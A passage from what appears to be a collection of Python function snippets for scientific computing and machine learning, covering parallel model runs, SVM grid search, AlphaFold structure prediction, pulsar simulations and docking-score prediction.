np.zeros(len(negative_set_part_train), dtype = 'i1')))\n data_part_test = np.float64(np.concatenate((positive_set_part_test, negative_set_part_test)))\n labels_part_test = np.concatenate((np.ones(len(positive_set_part_test), dtype = 'i1'), np.zeros(len(negative_set_part_test), dtype = 'i1')))\n \n # Specifying the pipeline and the CV structure\n pruner = feature_selection.VarianceThreshold()\n scaler = preprocessing.StandardScaler()\n feature_selector = feature_selection.SelectKBest(feature_selection.f_classif)\n classifier = svm.SVC(kernel = 'rbf', gamma = 0.01, class_weight = 'balanced')\n pipeline0 = pipeline.Pipeline([\n ('pruning', pruner),\n ('scaling', scaler),\n ('selection', feature_selector),\n ('classification', classifier)\n ])\n cv_structure = model_selection.StratifiedShuffleSplit(n_splits = 10, test_size = 0.2)\n scoring = 'recall_macro' #same as balanced accuracy\n grid = model_selection.GridSearchCV(pipeline0, scoring = scoring, param_grid = param_grid, cv = cv_structure, n_jobs = 1)\n \n # Training the pipeline, saving the data\n grid.fit(data_part_train, labels_part_train)\n results_table[selection_idx][0] = np.log10(grid.best_params_['classification__C'])\n results_table[selection_idx][1] = grid.best_params_['selection__k']\n results_table[selection_idx][2] = grid.best_score_\n \n # Testing the pipeline, saving the data\n results_table[selection_idx][3] = grid.score(data_part_test, labels_part_test)",
"def models_optimize_parallel(model, react_set, fract_opt=0.1, save_file_loc=None, fva=False, processes=cpu_count()):\n with ProcessPool(processes, initializer=species_init_Objective, initargs=(model,react_set,fract_opt)) as pool:\n try:\n if fva==True:\n future = pool.map(models_optimize_fva, [x.id for x in model.strains], timeout=100)\n future_iterable = future.result()\n pheno = list(future_iterable)\n else:\n future = pool.map(models_optimize_objective, [x.id for x in model.strains], timeout=20)\n future_iterable = future.result()\n pheno = list(future_iterable)\n except TimeoutError as error:\n print(\"function took longer than %d seconds\" % error.args[1])\n except Exception as error:\n print(\"function raised %s\" % error)\n\n if save_file_loc!=None:\n save_json_obj(dict(pheno), save_samples_dir+\"sample_\"+str(t)+\".json\")\n save_json_obj(variant_id_dec_dict, save_samples_dir+\"sample_\"+str(t)+\"_varDecision.json\")\n \n pool.close()\n pool.stop()\n pool.join()\n return pheno",
"def compute_models_parallel(data, varying_parameters=None, constant_parameters=None, n_max_processes=None):\n mp_models = MultiprocModelsRunner(MultiprocModelsWorkerLDA, data, varying_parameters, constant_parameters,\n n_max_processes=n_max_processes)\n\n return mp_models.run()",
"def evaluate_multiprocessing(\n model_paths, save_preds_to_db, save_prefix,\n X, y, labeled_indices,\n metrics, k_values,\n num_processes=4):\n num_models = len(model_paths)\n pool = Pool(processes=num_processes)\n args = zip(\n model_paths,\n range(num_models),\n repeat(save_preds_to_db, num_models),\n repeat(save_prefix, num_models),\n repeat(metrics, num_models),\n repeat(k_values, num_models),\n repeat(X, num_models),\n repeat(y, num_models),\n repeat(labeled_indices, num_models))\n\n results = [None] * num_models\n for model_index, model_results in tqdm.tqdm(\n pool.imap(evaluate_single_model_unpack_args, args),\n total=num_models, desc='Evaluating models'):\n\n results[model_index] = model_results.flatten()\n\n pool.close()\n return results",
"def run_regression_experiments(self):\n assert self.patientIDs # assert not empty\n self.log.info(\"Running experiments for {} patients\".format(len(self.patientIDs)))\n\n results_batch = defaultdict(dict)\n results_single = dict()\n for patient in self.patientIDs:\n patient_experiment = PatientPredictionExperiment(\n patient_id=patient, algorithm=self.algorithm,\n is_batch=self.isBatch\n )\n # run results for single patients\n if not self.isBatch:\n results_single[patient] = patient_experiment.run_experiment()\n self.log.debug(\"Start processing single results: {}\".format(results_single[patient]))\n # super verbose debug information should be logged with debug option\n else:\n # TODO: think about consistent interfaces\n batch_results, self._allFeatureDesp = patient_experiment.run_experiment()\n self.log.info(\"Start processing batch results with {} batches\".format(len(batch_results)))\n batchNo = 0\n for results in batch_results:\n # here are the result for each feature subset for each patients\n results_batch[batchNo][patient] = results\n batchNo += 1\n if self.algorithm == \"fm\":\n return\n if not self.isBatch:\n results_overall = self.process_results(results_single)\n self.store_results(results_overall, results_single)\n self.log.info(\"Finished running experiment\")\n else:\n self.record_batch_experiment()\n for batchNo, patient_results in results_batch.iteritems():\n # patient_results = results_single\n results_overall = self.process_results(patient_results)\n self.store_results(results_overall, patient_results, self._allFeatureDesp[batchNo])\n self.log.info(\"Finished running experiment No. {}\".format(batchNo))",
"def model_multiprocess(reservoir_dicts, dual_lists, root, run_dict,\n perm_tups=None, cores=2, machine='laptop',\n parallel=False):\n sys.setrecursionlimit(5000000)\n if parallel:\n Parallel(n_jobs=cores)(\n delayed(NM08_model_loop)(root, run_dict, res_dict, dual_list,\n perm_tup, machine, 100, k+j+m)\n for j, res_dict in enumerate(reservoir_dicts)\n for k, dual_list in enumerate(dual_lists)\n for m, perm_tup in enumerate(perm_tups)\n )\n else:\n for r_dict in reservoir_dicts:\n NM08_model_loop(root, run_dict, r_dict, machine)\n return",
"def mix_pred(self, params, smap=None, param_shapes=None):\n if self.iter == 0:\n raise RuntimeError(\"Can not mix samples before at least one \"\n \"iteration has been done.\")\n\n # Check if one or multiple parameters are requested\n if isinstance(params, str):\n only_one_param = True\n params = [params]\n smap = [smap]\n param_shapes = [param_shapes]\n else:\n only_one_param = False\n\n # Process each parameter\n mean = []\n var = []\n for ip in range(len(params)):\n\n # Gather moments from each worker\n par = params[ip]\n sit = smap[ip] if smap is not None else None\n\n if sit is None:\n # Every site contribute to the parmeter\n fit = self.workers[0].fit\n samp = fit.extract(pars=par)[par]\n # Ensure that one dimensional parameters with length 1 are not\n # scalarised\n if fit.par_dims[fit.model_pars.index(par)] == [1]:\n samp = samp[:,np.newaxis]\n par_shape = list(samp.shape)\n par_shape[0] = len(self.workers)\n # Get the moments\n ns = np.empty(len(self.workers), dtype=np.int64)\n ms = np.empty(par_shape)\n vs = np.empty(par_shape)\n ns[0] = samp.shape[0]\n ms[0] = np.mean(samp, axis=0)\n vs[0] = np.sum(samp**2, axis=0) - ns[0]*(ms[0]**2)\n for iw in range(1,len(self.workers)):\n fit = self.workers[iw].fit\n samp = fit.extract(pars=par)[par]\n # Ensure that one dimensional parameters with length 1 are\n # not scalarised\n if fit.par_dims[fit.model_pars.index(par)] == [1]:\n samp = samp[:,np.newaxis]\n # Moments of current site\n ns[iw] = samp.shape[0]\n ms[iw] = np.mean(samp, axis=0)\n samp -= ms[iw]\n np.square(samp, out=samp)\n vs[iw] = np.sum(samp, axis=0)\n\n # Combine moments\n n = np.sum(ns)\n mc = np.sum((ms.T*ns).T, axis=0)\n mc /= n\n temp = ms-mc\n np.square(temp, out=temp)\n np.multiply(temp.T, ns, out=temp.T)\n temp += vs\n vc = np.sum(temp, axis=0)\n vc /= (n-1)\n mean.append(mc)\n var.append(vc)\n\n else:\n # Parameters not consistent among sites\n par_shape = param_shapes[ip]\n ns = np.empty(len(self.workers), dtype=np.int64)\n ms = []\n vs = []\n count = np.zeros(par_shape)\n for iw in range(len(self.workers)):\n count[sit[iw]] += 1 # Check smap\n fit = self.workers[iw].fit\n samp = fit.extract(pars=par)[par]\n # Ensure that one dimensional parameters with length 1 are\n # not scalarised\n if fit.par_dims[fit.model_pars.index(par)] == [1]:\n samp = samp[:,np.newaxis]\n # Moments of current site\n ns[iw] = samp.shape[0]\n ms.append(np.mean(samp, axis=0))\n samp -= ms[iw]\n np.square(samp, out=samp)\n vs.append(np.sum(samp, axis=0))\n if np.count_nonzero(count) != count.size:\n raise ValueError(\"Arg. `smap` does not fill the parameter\")\n\n # Combine\n onecont = count == 1\n if np.all(onecont):\n\n # Every index has only one contribution\n mc = np.zeros(par_shape)\n vc = np.zeros(par_shape)\n for iw in range(len(self.workers)):\n mc[sit[iw]] = ms[iw]\n vc[sit[iw]] = vs[iw]/(ns[iw]-1)\n mean.append(mc)\n var.append(vc)\n\n else:\n # Combine every index\n nc = np.zeros(par_shape, dtype=np.int64)\n mc = np.zeros(par_shape)\n vc = np.zeros(par_shape)\n for iw in range(len(self.workers)):\n nc[sit[iw]] += ns[iw]\n mc[sit[iw]] += ns[iw]*ms[iw]\n mc /= nc\n for iw in range(len(self.workers)):\n temp = np.asarray(ms[iw] - mc[sit[iw]])\n np.square(temp, out=temp)\n temp *= ns[iw]\n temp += vs[iw]\n vc[sit[iw]] += temp\n vc /= (nc-1)\n\n if np.any(onecont):\n # Some indexes have only one contribution\n # Replace those with more precise values\n for iw in range(len(self.workers)):\n mc[sit[iw]] = ms[iw]\n vc[sit[iw]] = vs[iw]/(ns[iw]-1)\n\n mean.append(mc)\n var.append(vc)\n\n # Return\n if only_one_param:\n return mean[0], var[0]\n else:\n return mean, var",
"def predict_structure(prefix, model_runner_1: alphafold.model.model.RunModel,\n model_runner_3: alphafold.model.model.RunModel,\n feature_dict, Ls: list[int], model_params: haiku.Params, use_model, do_relax=False,\n random_seed=0):\n\n # Minkyung's code\n # add big enough number to residue index to indicate chain breaks\n idx_res = feature_dict['residue_index']\n L_prev = 0\n # Ls: number of residues in each chain\n for L_i in Ls[:-1]:\n idx_res[L_prev + L_i:] += 200\n L_prev += L_i\n chains = list(\"\".join([ascii_uppercase[n] * L for n, L in enumerate(Ls)]))\n feature_dict['residue_index'] = idx_res\n\n # Run the models.\n plddts, paes = [], []\n unrelaxed_pdb_lines = []\n relaxed_pdb_lines = []\n\n print(f\"Use_model {use_model}\")\n\n for model_name, params in model_params.items():\n if model_name in use_model:\n print(f\"running {model_name}\")\n # swap params to avoid recompiling\n # note: models 1,2 have diff number of params compared to models 3,4,5\n if any(str(m) in model_name for m in [1, 2]): model_runner = model_runner_1\n if any(str(m) in model_name for m in [3, 4, 5]): model_runner = model_runner_3\n model_runner.params = params\n\n processed_feature_dict: affeatures.FeatureDict = model_runner.process_features(feature_dict,\n random_seed=random_seed)\n # prediction_result is a dictionary of NumPy feature arrays\n prediction_result: dict = model_runner.predict(processed_feature_dict)\n unrelaxed_protein: protein.Protein = protein.from_prediction(processed_feature_dict, prediction_result)\n unrelaxed_pdb_lines.append(protein.to_pdb(unrelaxed_protein))\n plddts.append(prediction_result['plddt'])\n paes.append(prediction_result['predicted_aligned_error'])\n\n if do_relax:\n # Relax the prediction.\n amber_relaxer: relax.AmberRelaxation = relax.AmberRelaxation(max_iterations=0, tolerance=2.39,\n stiffness=10.0, exclude_residues=[],\n max_outer_iterations=20)\n relaxed_pdb_str, _, _ = amber_relaxer.process(prot=unrelaxed_protein)\n relaxed_pdb_lines.append(relaxed_pdb_str)\n\n # rerank models based on predicted lddt\n lddt_rank = np.mean(plddts, -1).argsort()[::-1]\n out = {}\n print(\"reranking models based on avg. predicted lDDT\")\n for n, r in enumerate(lddt_rank):\n print(f\"model_{n + 1} {np.mean(plddts[r])}\")\n\n unrelaxed_pdb_path = f'{prefix}_unrelaxed_model_{n + 1}.pdb'\n with open(unrelaxed_pdb_path, 'w') as f:\n f.write(unrelaxed_pdb_lines[r])\n set_bfactor(unrelaxed_pdb_path, plddts[r], idx_res, chains)\n\n if do_relax:\n relaxed_pdb_path = f'{prefix}_relaxed_model_{n + 1}.pdb'\n with open(relaxed_pdb_path, 'w') as f: f.write(relaxed_pdb_lines[r])\n set_bfactor(relaxed_pdb_path, plddts[r], idx_res, chains)\n\n out[f\"model_{n + 1}\"] = {\"plddt\": plddts[r], \"pae\": paes[r]}\n return out",
"def RUN_PULSAR(numTrials, rateMap, numPhotons=48,numPulsars = 6, angularSize=10.0, outputSize=100, mcList='MCOut.pickle',flatLevel = 0.0,HESS=False, Sig = -1,numProcs = 10):\r\n import FermiPSF, ParseFermi\r\n \r\n print 'Beginning MC Series\\nProgress'\r\n\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n partial_MC_PULSAR_THREAD = partial( MC_PULSAR_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize, numPulsars = numPulsars,Sig=Sig)\r\n mcOut = p.map(partial_MC_PULSAR_THREAD, mcOut)\r\n \r\n# for i in range(numTrials):\r\n# np.random.seed()\r\n# # Compute number of background photons\r\n# numSignal = np.random.poisson(lam = .25*numPhotons)\r\n# if (HESS == True):\r\n# numSignal = np.random.poisson(lam = .05*numPhotons)\r\n# if Sig >= 0:\r\n# numSignal = np.random.poisson(lam = Sig*numPhotons)\r\n# \r\n# bg = numPhotons-numSignal # number of BG photons\r\n# \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack ,HESS=HESS, angularSize = angularSize )\r\n# \r\n# \r\n# # Run MC for source photons \r\n# data = MC_PULSAR(map,numSignal, numPulsars,angularSize,outputSize,PSFTableFront, PSFTableBack, HESS = HESS)\r\n# # Concatenate and append this run to the simulation output\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def solve_all_parallel(self, use_cache=True):\n self.generate_test_instances()\n\n # workers = multiprocessing.cpu_count()/2\n workers = 8\n\n # create two queues: one for files, one for results\n work_queue = multiprocessing.Queue()\n done_queue = multiprocessing.Queue()\n processes = []\n\n # add filepaths to work queue\n # format is (problemID, configID)\n # start processes\n if use_cache:\n cachedResults = {}\n try:\n with open(self.cacheFile, \"rb\") as f:\n cachedResults = pkl.load(f)\n except: # pragma: no cover\n print(\"Creating new cache file: {}\".format(self.cacheFile))\n with open(self.cacheFile, \"wb\") as f:\n for instance in self.instances:\n instancehash = hash(instance)\n if instancehash in cachedResults:\n # Retrieve TestResult from the results dictionary:\n self.results.append(cachedResults[instancehash])\n else:\n # Add this result to the cache\n work_queue.put((instance.testproblem.problemID, instance.solverconfig.configID))\n\n else:\n for instance in self.instances:\n work_queue.put((instance.testproblem.problemID, instance.solverconfig.configID))\n\n for w in range(workers):\n p = multiprocessing.Process(target=worker,\n args=(self.problemDir,\n self.configDir,\n work_queue,\n done_queue))\n p.start()\n processes.append(p)\n work_queue.put((STOP,STOP))\n\n # Poll done_queue and empty it right away.\n # keep track of the number of poison pills we get-\n # once it's equal to the number of workers, stop.\n processes_left = workers\n while processes_left:\n\n if not done_queue.empty():\n result = done_queue.get()\n if result == STOP:\n processes_left -= 1\n print(\"Processes left: {}\".format(str(processes_left)))\n else:\n self.results.append(result)\n if use_cache: # Add new cached result to the cache.\n with open(self.cacheFile, \"wb\") as f:\n cachedResults[result.instancehash] = result\n pkl.dump(cachedResults, f)\n time.sleep(0.5) # Wait for processes to run.\n\n for p in processes:\n print(\"process {} exited with code {}\".format(p,p.exitcode))\n return",
"def run_models(X_train, X_test, Y_train, Y_test, models_list, dataframe_name):\n results = []\n for type, model in models_list:\n model.fit(X_train, Y_train)\n Y_predict = model.predict(X_test)\n accuracy = accuracy_score(Y_test, Y_predict)*100\n results.append([type, accuracy, dataframe_name])\n return results",
"def main():\n pool = Pool(processes=50)\n results = pool.imap_unordered(experiment, range(50), chunksize=1)\n\n # Output\n offset = 1\n # for i, (data_surv, data_order, data_ctrl) in enumerate(results):\n for i, (data_surv, data_ctrl) in enumerate(results):\n with open(f'../data/reproductive_barrier/hybrid_survival_percentage/experiment_{i+offset}.csv', 'w') as fp:\n for t, surv in data_surv:\n fp.write(f'{int(t)},{float(surv)}\\n')\n\n with open(f'../data/reproductive_barrier/order_of_incompatibility/experiment_{i+offset}.csv', 'w') as fp:\n for x in data_order:\n fp.write('%d,' % int(x[0]) + ','.join(map(str, x[1:])) + '\\n')\n\n with open(f'../data/reproductive_barrier/control_survival_percentage/experiment_{i+offset}.csv', 'w') as fp:\n for t, surv in data_ctrl:\n fp.write(f'{int(t)},{float(surv)}\\n')\n\n return",
"def process_outputs(self, data, output, save=True):\n\n pred_spline = output['pred_polys']\n\n # preds = self.spline.sample_point(pred_spline)\n preds = pred_spline\n torch.cuda.synchronize()\n preds = preds.cpu().numpy()\n\n pred_spline = pred_spline.cpu()\n pred_spline = pred_spline.numpy()\n\n instances = data['instance']\n polys = []\n results = []\n for i, instance in enumerate(instances):\n detection = defaultdict(float)\n poly = preds[i]\n poly = poly * data['patch_w'][i]\n poly[:, 0] += data['starting_point'][i][0]\n poly[:, 1] += data['starting_point'][i][1]\n detection['image_id'] = instance['image_path']\n img_h, img_w = instance['height'], instance['width']\n\n detection['poly'] = poly\n detection['image_size'] = [img_w, img_h]\n # pred_sp = pred_spline[i]\n # pred_sp = pred_sp * data['patch_w'][i]\n # pred_sp[:, 0] += data['starting_point'][i][0]\n # pred_sp[:, 1] += data['starting_point'][i][1]\n #\n # instance['spline_pos'] = pred_sp.tolist()\n\n polys.append(poly)\n\n results.append(detection)\n\n\n # if save:\n\n # predicted_poly = []\n\n\n\n # pred_mask = np.zeros((img_h, img_w), dtype=np.uint8)\n # utils.draw_poly(pred_mask, poly.astype(np.int))\n # predicted_poly.append(poly.tolist())\n #\n # # gt_mask = utils.get_full_mask_from_instance(\n # # self.min_area,\n # # instance)\n #\n # instance['my_predicted_poly'] = predicted_poly\n # # instance_id = instance['instance_id']\n # image_id = instance['image_id']\n #\n # pred_mask_fname = os.path.join(self.output_dir, '{}_pred.png'.format(image_id))\n # instance['pred_mask_fname'] = os.path.relpath(pred_mask_fname, self.output_dir)\n #\n # # gt_mask_fname = os.path.join(self.output_dir, '{}_gt.png'.format(instance_id))\n # # instance['gt_mask_fname'] = os.path.relpath(gt_mask_fname, self.output_dir)\n #\n # instance['n_corrections'] = 0\n #\n # info_fname = os.path.join(self.output_dir, '{}_info.json'.format(image_id))\n #\n # with warnings.catch_warnings():\n # warnings.simplefilter(\"ignore\")\n # sio.imsave(pred_mask_fname, pred_mask)\n # # sio.imsave(gt_mask_fname, gt_mask)\n #\n # # print '==> dumping json'\n # with open(info_fname, 'w') as f:\n # json.dump(instance, f, indent=2)\n\n return results, polys",
"def predict(self, peptides, **kwargs):\n raise NotImplementedError",
"def post_process(dtw_threshold, fidx, TESTSET_NAME):\n\n data_dir = str(Path(os.getcwd()).parent) + '/data/{}/'.format(TESTSET_NAME)\n X_test = np.load(data_dir+'/processed_dataset/scaled_ppgs.npy')\n y_seg_trues = np.load(data_dir+'/processed_dataset/seg_labels.npy')\n\n working_dir = 'results/{}/{}/dtw_thresh_{}/'.format(TESTSET_NAME, fidx, dtw_threshold)\n\n check_mkdir('results/{}'.format(TESTSET_NAME))\n check_mkdir('results/{}/{}/'.format(TESTSET_NAME, fidx))\n check_mkdir(working_dir)\n\n pool_args = []\n for row in X_test:\n pool_args.append([row, dtw_threshold, fidx])\n pool = Pool(processes=8)\n y_seg_preds = pool.starmap(make_predictions, pool_args)\n pool.terminate()\n\n y_seg_preds = np.asarray(y_seg_preds)\n np.save(working_dir+'/y_pred_{}.npy'.format(dtw_threshold), y_seg_preds)\n np.save(working_dir+'/y_true_{}.npy'.format(dtw_threshold), y_seg_trues)",
"def predict(self, smiles_list):\n data = list(enumerate(smiles_list))\n num_data = len(data)\n num_sub_proc = min(self.num_sub_proc, num_data)\n\n q1 = Queue()\n manager = Manager()\n return_dict = manager.dict()\n proc_master = Process(target=self.creator,\n args=(q1, data, num_sub_proc))\n proc_master.start()\n\n # create slave process\n procs = []\n for sub_id in range(0, num_sub_proc):\n proc = Process(target=self.worker, args=(q1, return_dict))\n procs.append(proc)\n proc.start()\n\n q1.close()\n q1.join_thread()\n proc_master.join()\n for proc in procs:\n proc.join()\n keys = sorted(return_dict.keys())\n\n result_dict = dict()\n docking_score_list = list()\n if self.rescoring:\n docking_re_list = list()\n\n for key in range(num_data):\n if key in keys:\n result_dict0 = return_dict[key]\n if 'docking' in result_dict0:\n docking_score = result_dict0['docking']\n else:\n docking_score = np.array([99.999], dtype=np.float32)\n\n if self.rescoring:\n if 'docking_re' in result_dict0:\n docking_re = result_dict0['docking_re']\n else:\n docking_re = np.array([99.999], dtype=np.float32)\n\n else:\n docking_score = np.array([99.999], dtype=np.float32)\n if self.rescoring:\n docking_re = np.array([99.999], dtype=np.float32)\n\n docking_score_list += [docking_score]\n if self.rescoring:\n docking_re_list += [docking_re]\n\n result_dict['docking'] = docking_score_list\n if self.rescoring:\n result_dict['docking_re'] = docking_re_list\n\n if self.use_my_module:\n self.my_class.predict(self, smiles_list, result_dict, return_dict)\n\n return result_dict",
"def prepare(self, n_cores=1, ipp_client=None):\n if len(self.shape_parameters):\n self.morpher = MORPHERS[self.config['morpher']](self.config.get('morpher_config', {}),\n self.shape_parameters)\n zs_list = self.morpher.get_anchor_points(bounds=self.get_bounds())\n\n # Create the configs for each new model\n configs = []\n for zs in zs_list:\n config = deepcopy(self.pdf_base_config)\n for i, (setting_name, (anchors, _, _)) in enumerate(self.shape_parameters.items()):\n # Translate from zs to settings using the anchors dict. Maybe not all settings are numerical.\n config[setting_name] = anchors[zs[i]]\n if ipp_client is None and n_cores != 1:\n # We have to compute in parallel: must have delayed computation on\n config['delay_pdf_computation'] = True\n configs.append(config)\n\n # Create the new models\n if n_cores == 1:\n models = [Model(c) for c in tqdm(configs, desc=\"Computing/loading models on one core\")]\n\n elif ipp_client is not None:\n models = create_models_ipyparallel(configs, ipp_client,\n block=self.config.get('block_during_paralellization', False))\n\n else:\n models = [Model(c) for c in tqdm(configs, desc=\"Preparing model computation tasks\")]\n\n hashes = set()\n for m in models:\n for s in m.sources:\n hashes.add(s.hash)\n\n compute_many(hashes, n_cores)\n\n # Reload models so computation takes effect\n models = [Model(c) for c in tqdm(configs, desc=\"Loading computed models\")]\n\n # Add the new models to the anchor_models dict\n for zs, model in zip(zs_list, models):\n self.anchor_models[tuple(zs)] = model\n\n # Build the interpolator for the rates of each source.\n self.mus_interpolator = self.morpher.make_interpolator(f=lambda m: m.expected_events(),\n extra_dims=[len(self.source_name_list)],\n anchor_models=self.anchor_models)\n\n self.is_data_set = False\n self.is_prepared = True",
"def predictManyIpdFuncModel(self, refId):\n\n # Materialized the numpy wrapper around the shared data\n snipFunction = self.snippetFunc(refId, self.post, self.pre)\n\n def fMany(sites):\n contexts = [snipFunction(x[0], x[1]) for x in sites]\n return self.gbmModel.getPredictions(contexts)\n\n return fMany",
"def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)",
"def worker(nums, outdict):\n print(threading.current_thread().name)\n print (\"pid:\", os.getpid())\n for n in nums:\n outdict[n] = factorize_naive(n)",
"def setup_all_data_for_predict(self, roi, contrast, run_type='WMM', postFix=['mcf','sgtf']):\n\t\tself.hdf5_filename = os.path.join(self.conditionFolder(stage = 'processed/mri', run = self.runList[self.conditionDict[run_type][0]]), run_type + '.hdf5')\n\t\th5file = openFile(self.hdf5_filename, mode = 'r+', title = run_type + \" file\")\t\n\t\t\n\t\t# Load all functional data (per run) and load all combined data:\n\t\troi_dict = {}\n\t\troi_data_per_roi = []\n\t\tmask_data_per_roi = []\n\n\t\tfor j in range(len(roi)):\n\t\t\tpatch = 1\n\t\t\tmask_data = []\n\t\t\tcontrast_dict = {}\n\t\t\tcombined_dict = {}\n\t\t\troi_data_PFR = self.roi_data_from_hdf(h5file, roi_wildcard = roi[j], data_type = 'PRF_coef', combined = True).squeeze()\n\t\t\tfor contr_nr in range(1,25): # 24 relevant contrasts; 12 patches vs baseline \\ 12 patches vs stimulation\n\t\t\t\troi_data_runs = []\n\t\t\t\troi_data_comb = []\n\t\t\t\tfor r in [self.runList[i] for i in self.conditionDict[run_type]]:\n\t\t\t\t\tif roi_data_runs == []:\n\t\t\t\t\t\troi_data_comb.append(self.roi_data_from_hdf(h5file, roi_wildcard = roi[j], data_type = contrast + str(contr_nr), combined = True).squeeze())\n\t\t\t\t\troi_data_runs.append(self.roi_data_from_hdf(h5file, roi[j], contrast + str(contr_nr), run = r).squeeze()) # squeeze()\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\tif contr_nr % 2 == 1:\n\t\t\t\t\tcontrast_dict.update({'base_con' + str(patch) : np.hstack(roi_data_runs)})\n\t\t\t\t\tcontrast_dict.update({'base_con_comb' + str(patch) : np.hstack(roi_data_comb)})\n\t\t\t\telif contr_nr % 2 == 0:\n\t\t\t\t\tcontrast_dict.update({'stim_con' + str(patch) : np.hstack(roi_data_runs)})\n\t\t\t\t\tcontrast_dict.update({'stim_con_comb' + str(patch) : np.hstack(roi_data_comb)})\n\t\t\t\t\tpatch += 1\n\t\t\t\tif contr_nr == 24:\n\t\t\t\t\tcontrast_dict.update({'PRF_coef': roi_data_PFR})\n\t\t\t\t\t\n\n\t\t\troi_dict.update({roi[j]:contrast_dict})\t\n\t\t\n\t\treturn roi_dict",
"def mite_2m(train_df, test_df, features, outcome, treatment, exposure, clf_t, clf_c, clf_er):\n np.random.seed(0)\n\n train_exposed_df, train_not_exposed_df = split_treatment_control(train_df, exposure)\n train_t_df, _ = split_treatment_control(train_df, treatment)\n\n clf_t_trained = clf_t.fit(train_exposed_df[features], train_exposed_df[outcome])\n clf_c_trained = clf_c.fit(train_not_exposed_df[features], train_not_exposed_df[outcome])\n clf_er_trained = clf_er.fit(train_t_df[features], train_t_df[exposure])\n\n test_f_df = test_df[features]\n return clf_er_trained.predict_proba(test_f_df)[:, 1] * \\\n (clf_t_trained.predict_proba(test_f_df)[:, 1] - clf_c_trained.predict_proba(test_f_df)[:, 1])",
"def reproduce_paper():\n dirname = os.path.join(DATADIR, 'ptn_runs')\n tdatlst_f3 = [multiple_pandas_to_teacher_data(dirname)]\n tdatlst_f2 = [multiple_pandas_to_teacher_data(dirname, remove_f3=True)]\n\n target_f3, labels = ids.gen_model(f3=True)\n target_f2, _ = ids.gen_model(f3=False)\n\n # Phoneme models and samples\n # --------------------------\n plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 6.34,))\n sns.set(rc={'axes.facecolor': '#bbbbbb', 'grid.color': '#aaaaaa'})\n\n plt.subplot2grid((2, 3), (0, 0), rowspan=2, colspan=2)\n plt.title('A')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels,\n formants=[0, 1], nstd=2,\n legend=True, grayscale=True)\n plt.subplot2grid((2, 3), (0, 2))\n plt.title('B')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[1, 2],\n nstd=2, grayscale=True)\n plt.subplot2grid((2, 3), (1, 2))\n plt.title('C')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[0, 2],\n nstd=2, grayscale=True)\n\n plt.savefig('fig-1.png', dpi=300)\n\n # Articulation\n # ------------\n sns.set(rc={'axes.facecolor': '#e8e8e8', 'grid.color': '#ffffff'})\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 4.75,))\n\n ax1 = f.add_subplot(2, 1, 1)\n plt.title('A')\n indices = ids.plot_phoneme_articulation(tdatlst_f3, target_f3, labels,\n ax=ax1)\n ax2 = f.add_subplot(2, 1, 2)\n plt.title('B')\n ids.plot_phoneme_articulation(tdatlst_f2, 